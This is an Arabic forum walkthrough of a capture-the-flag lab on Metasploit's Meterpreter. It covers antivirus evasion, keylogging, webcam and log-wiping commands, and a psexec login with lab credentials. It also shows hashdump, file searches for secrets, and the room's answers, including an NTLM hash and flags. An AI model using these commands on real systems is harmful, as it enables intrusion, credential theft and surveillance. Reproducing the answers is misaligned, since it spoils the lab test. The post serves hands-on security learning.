مضى على الشبكة و يوم من العطاء.
  • تحذير: يجب على كل روّاد الشبكة تشغيل برامج الاختراق داخل الأنظمة الوهمية وهي بهدف التعلم وحماية الأعضاء والتوعية بها

[ WalkTh ] Metasploit : Meterpreter

3b0-0d3b0-0d is verified member.

{ || مشرف قسم CTF || }
.:: طاقم المشرفين ::.

السمعة:

  • Task 1
1700520709993.png
هنا يتحدث عن ال Meterpreter وكيف تشتغل

كيفية عمل Meterpreter :​

  1. تشغيل Meterpreter على النظام المستهدف دون تثبيت دائم :
    • يتم تشغيل Meterpreter على النظام المستهدف كوكيل.
    • لا يتم تثبيته على القرص الصلب الخاص بالنظام المستهدف بشكل دائم.
  2. تشغيله في الذاكرة :
    • Meterpreter يعمل في الذاكرة (RAM) دون الكتابة على القرص الصلب.
    • هذا التصميم يهدف إلى تجنب اكتشافه أثناء عمليات فحص برامج مكافحة الفيروسات.
  3. استخدام التواصل المشفر:
    • يتم التواصل بين Meterpreter وخادم Metasploit (الجهاز المهاجم) باستخدام تشفير ( TLS ) .
    • هذا يساعد في تجنب اكتشاف نظم منع الاختراق وكشف الاختراق على الشبكة.
  4. عدم وجود ملف ظاهر على القرص:
    • Meterpreter لا يترك ملفًا ظاهرًا على النظام المستهدف، مما يجعله أمرًا صعبًا للكشف عنه.
  5. التمويه:
    • على الرغم من أن Meterpreter معروف لبرامج مكافحة الفيروسات، إلا أنها توفر درجة من التمويه من خلال هذه الإجراءات.
  6. استخدام معرّفات العملية:
    • يتم تخصيص معرف عملية (PID) لـ Meterpreter على النظام المستهدف.
    • هذا المعرف يستخدم للتفاعل مع العملية عند الحاجة، مما يساعد في إدارة عمليات الاختراق.
:triangular_flag_on_post:Task 1
completed

  • Task 2
1700520722125.png
يتحدث هنا عن
  1. مكملات مرحلية (Staged payloads) : تُرسل إلى الهدف في خطوتين. يتم تثبيت الجزء الأول (الـ “stager”) ومن ثم يُطلب الجزء الثاني من ال payloads . هذا يُمكن من استخدام حجم أولي أصغر.
  2. مكملات متوالية (Inline payloads): تُرسل إلى الهدف في خطوة واحدة دون تقسيم.
والنص الثالث يشير الى كيف نستخدم msfvenom --list payloads | grep meterpreter عشان نبحث عن payloads مرتبطة بـ meterpreter
1700520732013.png
النص بحكي عن كيفيه اختيار إصدار Meterpreter المناسب لاستخدامه في عمليات الاختراق.
  • يشير النص إلى ضرورة اختيار الإصدار بناءً على ثلاثة عوامل:
  1. نظام التشغيل المستهدف (مثل Linux أو Windows أو Mac أو Android).
  2. المكونات المتاحة على النظام المستهدف (مثل توافر Python أو استخدام موقع ويب PHP).
  3. أنواع اتصال الشبكة الممكنة مع النظام المستهدف (مثل TCP أو HTTPS أو IPv6).
واعطى مثال كيف نختار الاصدار المناسب ل Meterpreter
1700520739229.png
:triangular_flag_on_post:Task 2

  • Task 3
هون يتحدث عن الاوامر الاساسيه ومقسمها حسب الفئات التاليه 👇
كود:
Core commands
File system commands
Networking commands
System commands
User interface commands
Webcam commands
Audio output commands
Elevate commands
Password database commands
Timestomp commands

الأوامر الأساسية (Core Commands) :
الأمرالوصف
?عرض قائمة المساعدة
backgroundنقل الجلسة الحالية إلى الخلفية
exitإنهاء جلسة Meterpreter
guidالحصول على معرف GUID للجلسة
helpعرض قائمة المساعدة
infoعرض معلومات حول وحدة Post
irbفتح واجهة Ruby التفاعلية في الجلسة الحالية
loadتحميل ملحقات Meterpreter
migrateنقل Meterpreter إلى عملية أخرى
runتنفيذ سكريبت Meterpreter أو وحدة Post
sessionsالتبديل بسرعة إلى جلسة أخرى
أوامر نظام الملفات (File System Commands) :
الأمرالوصف
cdتغيير الدليل
lsعرض قائمة الملفات في الدليل الحالي
pwdعرض المسار الحالي
editتحرير ملف
catعرض محتوى ملف
rmحذف ملف أو مجلد
searchالبحث عن ملفات
uploadرفع ملف أو مجلد
downloadتنزيل ملف أو مجلد
أوامر الشبكة (Networking Commands) :
الأمرالوصف
arpعرض جدول ARP (Address Resolution Protocol)
ifconfigعرض واجهات الشبكة المتاحة على النظام الهدف
netstatعرض اتصالات الشبكة
portfwdتوجيه منفذ محلي إلى خدمة بعيدة
routeعرض وتعديل جدول التوجيه
أوامر النظام (System Commands) :
الأمرالوصف
clearevمسح سجلات الأحداث (Event Logs)
executeتنفيذ أمر
getpidعرض معرف العملية الحالية
getuidعرض المستخدم الذي يعمل Meterpreter به
killإنهاء عملية
pkillإنهاء عمليات بالاسم
psعرض عمليات تعمل حالياً
rebootإعادة تشغيل الكمبيوتر عن بعد
shellالانتقال إلى وضع الشل (Command Shell)
shutdownإيقاف تشغيل الكمبيوتر عن بعد
sysinfoالحصول على معلومات حول النظام الهدف مثل نظام التشغيل
أوامر أخرى :
الأمرالوصف
idletimeيُعيد عدد الثواني التي كان فيها المستخدم على الجهاز عديم النشاط
keyscan_dumpيُفرغ مخزن ضغطات المفاتيح (Keylogger)
keyscan_startيبدأ بالتقاط ضغطات المفاتيح
keyscan_stopيتوقف عن التقاط ضغطات المفاتيح
screenshareيسمح لك بمشاهدة سطح مكتب المستخدم على الجهاز على الفور في الوقت الحقيقي
screenshotيلتقط لقطة شاشة لسطح المكتب التفاعلي
record_micيسجل الصوت من الميكروفون الافتراضي لعدد من الثواني (X ثواني)
webcam_chatيبدأ محادثة فيديو
webcam_listيعرض قائمة بكاميرات الويب المتاحة
webcam_snapيلتقط لقطة من كاميرا الويب المحددة
webcam_streamيشغل تيار فيديو من كاميرا الويب المحددة
getsystemيحاول رفع امتيازك إلى مستوى النظام المحلي (Local System)
hashdumpيفرغ محتويات قاعدة بيانات SAM (Security Account Manager)
اوامر اضافيه
Module Commands
الأمرالوصف
advancedعرض الخيارات المتقدمة لوحدة أو أكثر من الوحدات
backالانتقال إلى الخلف من السياق الحالي
clearmمسح مكدس الوحدة
favoriteإضافة وحدة أو وحدات إلى قائمة الوحدات المفضلة
favoritesعرض قائمة الوحدات المفضلة (الاختصار لـ show favorites)
infoعرض معلومات حول وحدة أو أكثر من الوحدات
listmعرض مكدس الوحدة
loadpathالبحث عن وتحميل الوحدات من مسار
optionsعرض الخيارات العامة أو لوحدة أو أكثر من الوحدات
popmاستخراج أحدث وحدة من مكدس الوحدة وجعلها نشطة
previousتعيين الوحدة المحملة مسبقًا كوحدة حالية
pushmدفع الوحدة النشطة أو قائمة الوحدات إلى مكدس الوحدة
reload_allإعادة تحميل جميع الوحدات من جميع مسارات الوحدات المحددة
searchالبحث في أسماء ووصف الوحدات
showعرض وحدات من نوع معين أو جميع الوحدات
useالتفاعل مع وحدة باستخدام الاسم أو مصطلح البحث/الفهرس
Job Commands
الأمرالوصف
handlerبدء معالج الحمولة كوظيفة
jobsعرض وإدارة الوظائف
killقتل وظيفة
rename_jobإعادة تسمية وظيفة
Resource Script Commands
الأمرالوصف
makercحفظ الأوامر المدخلة منذ البداية في ملف
resourceتنفيذ الأوامر المخزنة في ملف
Database Backend Commands
الأمرالوصف
analyzeتحليل معلومات قاعدة البيانات حول عنوان أو مجموعة عناوين معينة
db_connectالاتصال بخدمة بيانات موجودة
db_disconnectالاتصال بخدمة بيانات حالية
db_exportتصدير ملف يحتوي على محتويات قاعدة البيانات
db_importاستيراد ملف نتيجة فحص (سيتم اكتشاف نوع الملف تلقائيًا)
db_nmapتنفيذ Nmap وتسجيل الإخراج تلقائيًا
db_rebuild_cacheإعادة بناء ذاكرة التخزين المؤقت للوحدة في قاعدة البيانات (تم تجاوزها)
db_removeإزالة إدخال خدمة البيانات المحفوظة
db_saveحفظ اتصال خدمة البيانات الحالي كافتراضي لإعادة الاتصال عند بدء التشغيل
db_statusعرض حالة خدمة قاعدة البيانات الحالية
hostsعرض جميع الأجهزة في قاعدة البيانات
klistعرض قائمة تذاكر Kerberos في قاعدة البيانات
lootعرض جميع النفع في قاعدة البيانات
notesعرض جميع الملاحظات في قاعدة البيانات
servicesعرض جميع الخدمات في قاعدة البيانات
vulnsعرض جميع الثغرات في قاعدة البيانات
workspaceالتبديل بين مساحات العمل في قاعدة البيانات
:triangular_flag_on_post:Task 3
completed

  • Task 4
هنا يتحدث عن ما بعد الاستغلال

المساعدة (Help) :
يساعدك في تصفح الأوامر بسرعة بعد الحصول على جلسة.
1700520756792.png
الحصول على هوية المستخدم (Getuid) :
  • يعرض هوية المستخدم الذي يعمل به Meterpreter حاليا ويقدم الصلاحيات الحاليه.
1700520762698.png
قائمة العمليات (Ps) :
يعرض العمليات الجارية على النظام ويوفر معلومات (PID) .
1700520767803.png
الهجرة (Migrate) :
يساعد في التفاعل مع عمليه اخرى على النظام و يمكن استخدامه للتقاط الضغطات على اللوحه المفاتيح.
1700520773451.png
يوجد تحذير بالاسفل عند استخدام ال Migrate

تحذير ب فقدان الصلاحيات (Privilege Loss) :

إذا كنت تعمل في جلسة Meterpreter بصلاحيات مرتفعة، مثل صلاحيات مستخدم SYSTEM، وقررت الهجرة إلى عملية تم إطلاقها بصلاحيات منخفضة، مثل خادم ويب (webserver)، فإنك قد تفقد الصلاحيات العالية التي كنت تمتلكها. هذا يعني أنك لن تكون قادرا على تنفيذ الأوامر بصلاحيات مرتفعة بعد الهجرة.

استخراج كلمات المرور (Hashdump) :
يستخدم لعرض محتوى قاعدة بيانات SAM
ويشير إلى أن كلمات المرور المعروضة مخزنة بتنسيق NTLM.
وتستخدم في هجمات Pass-the-Hash
1700520781973.png
البحث (Search) :
يستخدم للبحث عن ملفات تحتوي على معلومات هامه مثل كلمات سر …الخ .
1700520794889.png
ال (Shell) :
يشغل واجهة سطر الأوامر القياسية على النظام الهدف.
يسمح بتنفيذ أوامر النظام على الهدف.
1700520852220.png
:triangular_flag_on_post:Task 4

  • Task 5
1700520891167.png
يتحدث هنا عن أوامر مثل “getsystem” و"hashdump" للحصول على معلومات هامة تساعدك في زيادة الامتيازات والتحرك داخل الشبكة.

ويتحدث عن مرحلة ما بعد الاختراق لها أهداف متعددة، وMeterpreter توفر وظائف يمكن أن تساعد في تحقيقها:
  1. جمع معلومات إضافية عن النظام المستهدف : تستخدم للحصول على مزيد من المعلومات حول النظام الهدف.
  2. البحث عن ملفات مثيرة للاهتمام وبيانات المستخدمين وواجهات الشبكة الإضافية: يمكن استخدامها للبحث عن ملفات مهمة أو بيانات تسجيل الدخول للمستخدمين أو واجهات الشبكة الإضافية ومعلومات أخرى مثيرة للاهتمام على النظام المستهدف.
  3. زيادة الامتيازات : تُستخدم لزيادة صلاحيات المستخدم للوصول إلى مزيد من المعلومات أو الوظائف.
  4. التحرك داخل النظام الهدف : تساعد في الانتقال بين أنظمة الشبكة الداخلية لاستكشاف الأهداف الأخرى وتوسيع الهجوم.
واخر شيء يتحدث عن او عند تحميل أي أداة إضافية باستخدام الأمر “load”، سترى خيارات جديدة في قائمة المساعدة.

على سبيل المثال، إذا قمت بتحميل وحدة Kiwi باستخدام الأمر “load kiwi”، ستظهر أوامر جديدة تخص هذه الوحدة في القائمة. 👇
1700520899958.png

1700520906568.png
يخبرك انه يمكنك استخدام exploit/windows/smb/psexec

بعد تشغيل المشين والتأكد من ان ال vpn شغال نفتح التيرمينال ونكتب msfconsole لفتح ميتا سبلويت

ثم نكنتب الامر use exploit/windows/smb/psexec
1700520913665.png
ثم نضع الخيارات التاليه وعن طريق الاوامر التاليه
Username
عن طريق الامر set SMBUser ballen
Password
عن طريق الامر set SMBPass Password1
RHOSTS
عن طريق الامر set RHOSTS ( ip )
1700520918540.png
ثم نكتبه الامر run
1700520923148.png
معنى السؤال الاول

ما هو اسم الكمبيوتر؟

يمكن المعرفه بأكثر من طريقه
  1. عن طريق ال shell
    نكتب الامر التالي shell
    ثم نكتب الامر التالي %echo %computername
1700520926965.png

عن طريق كتابه الامر التالي sysinfo تم ذكره سابقاً

1700520933174.png

:triangular_flag_on_post:Task 5-1

معنى السؤال الثاني

ما هو المجال المستهدف؟
يمكنك ان تجده ايضا عن طريق الامر السابق sysinfo
1700520933174.png

:triangular_flag_on_post:Task 5-2

معنى السؤال الثالث

ما هو اسم المشاركة التي من المحتمل أن يقوم المستخدم بإنشائها؟

يجب ان نضع الاتصال بالخلفيه عن طريق Control + Z
1700520955204.png
بعدها نبحث عن share

نجد post/windows/gather/enum_shares
1700520970428.png
بعدها عن طريق الامر use post/windows/gather/enum_shares ثم show options
1700520978174.png
بعدها يجب ان نتأكد ان الجلسه مازالت بالخلفيه عن طريق الامر sessions
1700520992408.png
ثم نكتب الامر set SESSION 1 ثم run
1700520995737.png
كما يظهر ال shares مع speedster

نكتب الامر sessions -i 1 لنرجع الى الجلسه
:triangular_flag_on_post:Task 5-3
speedster
معنى السؤال الرابع

ما هو تجزئة NTLM لمستخدم jchambers؟

يمكن معرفه عن طريق امر hashdump الذي اخذناه سابقاً
1700521000450.png
:triangular_flag_on_post:Task 5-4
69596c7aa1e8daee17f8e78870e25a5c
معنى السؤال الخامس

ما هي كلمة المرور ذات النص الواضح لمستخدم jchambers؟

يمكن الذهاب الى موقع hashes

ووضع الهاش 👇
1700521005945.png

:triangular_flag_on_post:Task 5-5

معنى السؤال السادس

أين يوجد ملف “secrets.txt”؟

يمكن البحث عنه عن طريق امر search -f secrets.txt
1700521028664.png
:triangular_flag_on_post:Task 5-6
c:\Program Files (x86)\Windows Multimedia Platform
معنى السؤال السابع

ما هي كلمة مرور تويتر التي تم الكشف عنها في ملف “secrets.txt”؟

يمكن عرض ما بداخل الملف عن طريق امر 👇
cat “c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt”
1700521049611.png
:triangular_flag_on_post:Task 5-7
KDSvbsw3849!
معنى السؤال الثامن

أين يوجد ملف “realsecret.txt”؟

يمكن البحث عنه عن طريق امر search -f realsecret.txt
1700521055110.png
:triangular_flag_on_post:Task 5-8
c:\inetpub\wwwroot\
معنى السؤال التاسع

ما هو السر الحقيقي؟( يقصد الذي بداخل الملف )

يمكن عرض ما بداخل الملف عن طريق امر "cat "c:\inetpub\wwwroot\realsecret.txt
:triangular_flag_on_post:Task 5-9
The Flash is the fastest man alive
1700521060166.png
 

المرفقات

  • 1700521016535.png
    1700521016535.png
    12.2 KB · المشاهدات: 168
التعديل الأخير:

آخر المشاركات

فانوس

رمضان
عودة
أعلى